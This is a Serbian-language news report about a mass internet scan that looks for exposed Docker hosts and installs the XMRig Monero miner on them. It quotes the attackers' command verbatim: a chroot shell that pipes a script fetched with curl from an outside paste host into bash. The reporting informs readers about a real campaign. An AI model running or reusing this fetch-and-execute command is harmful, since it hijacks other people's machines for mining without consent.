Hakeri u masovnoj potrazi za ranjivostima koje omogućavaju rudarenje Monero valute

Prema poslednjim izveštajima grupa hakera se upustila u masovno skeniranje interneta, a u potrazi za ranjivostima koje bi otvorile vrata za ubacivanje Docker softvera koji služi za rudarenje Monero valute, i to bez znanja žrtava.

Prema bezbednosnim istraživačima iz agencije Bad Pockets „veliko skeniranje“ je počelo 23. novembra, te služi za detektovanje propusta koji omogućavaju implementaciju malicioznog koda. Ovaj tip aktivnosti je, tvrde eksperti, prilično uobičajen, ali je ova kampanja jedinstvena zbog masovnosti pretrage. Procenjuje se da je kampanja obuhvatila preko 59 hiljada IP mreža, da bi se, kada se ranjivost detektuje, na uređaje otpremao kod chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash, koji potom dalje preuzima skripte sa servera napadača, te na kraju instalira bot-a za rudarenje kriptovaluta – Monero miner XMRig.

Pročitajte i:  Hakeri na autoputu: Pornografski "napad" na vozače

Od kada je kampanja počela napadači su izrudarili tek 14,8 Monero jedinica, što je oko 740 dolara, ali bi suma mogla da se značajno uveća, budući da se radi o ogromnoj kampanji.

Izvor: TNW

Facebook komentari:

Vertiv

5G 2019
Tagovi: , , , , , ,

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.